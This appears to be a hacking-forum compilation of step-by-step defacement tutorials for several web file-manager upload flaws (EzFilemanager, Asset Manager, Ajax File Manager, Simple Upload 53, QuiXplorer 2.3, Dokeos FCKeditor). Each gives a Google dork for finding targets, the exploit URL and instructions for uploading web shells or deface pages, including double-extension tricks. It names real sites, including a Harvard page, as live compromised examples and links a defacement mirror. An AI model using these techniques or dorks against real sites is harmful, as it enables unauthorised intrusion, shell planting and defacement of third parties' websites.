EzFilemanager Deface Upload vulnerability

EzFilemanager Deface Upload vulnerability

 


Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

Asset Manager :Shell and Files upload Vulnerability

Asset Manager :Shell and Files upload Vulnerability

Google Dork : “inurl:Editor/assetmanager/assetmanager.asp”
images (235×215)

Open Google.com/ncr and enetr this dork

“inurl:Editor/assetmanager/assetmanager.asp”

Now Open any site from search results

Now You will Got a Page Like That

New Folder  Del Folder

Upload File: 

and site url will be like site.com/Editor/assetmanager/assetmanager.asp

Change The Flash into all Files and Now choose Your File and Upload

and acess Your file here site.com/Editor/assets/yourfilehere

Special : How To upload a cool deface ;)
Go; to http://www.flashvortex.com/ and choose a cool design .. Now put your text and download it ..
rename the file After Downloading and upload it :)

Ajax File Manager ~ Shell and Files Upload Vulnerability

372186_100002061928187_1094618549_n.jpg (180×178)

Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/

for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Now Find Upload Upload and Upload Your shell/Deface/file

To view you File find /Uploaded/ directory in Website by using your brain :P

example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt

“Simple Upload 53″ : Shell Upload Vulnerability

Title : “Simple Upload 53″ : Shell Upload Vulnerability
jpeg (207×125)Google Dork : “inurl:simple-upload-53.php”          


Go to Google.com and enter dork ~
“inurl:simple-upload-53.php” 


see search results and select any website

the exploit url will be link this


http://www.site.com/simple-upload-53.php

Now Upolad Your shell here as .php.jpg .php.girf etc
and you can upload your deface in image Type

to view you uploaded file just goto http://www.site.com/files/yourfilehere

Demo site : http://www.stpatricksdayshirts.com/simple-upload-53.php
Uploaded file : http://www.stpatricksdayshirts.com/files/devilscafe.jpg

Funnt Thing : http://www.stpatricksdayshirts.com/simple-upload-53.php?message= Put Your Massege here it will show on website :D

“QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

“QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability”

computer-virus-iran-power-nuclear.jpg (400×300)

open Google.com and type this dork 
intitle:”QuiXplorer 2.3 – the QuiX project”

you’ll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity

http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
 after Going to this you will saw a file manager 
you can upload your files here
find this edit file create file etc icons in page and click on last, its upload option

You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example :

http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes

Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view 
Live demo : 

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes


http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
i know some asshole will chnage the deface 
so its mirrOr of defacements http://attack-h.org/attack/?id=8452

 

“Portail Dokeos” deface and Shell Upload vulnerability

Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password

code-hack.jpg (240×240)

Google Dork : “Portail Dokeos 1.8.5″
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here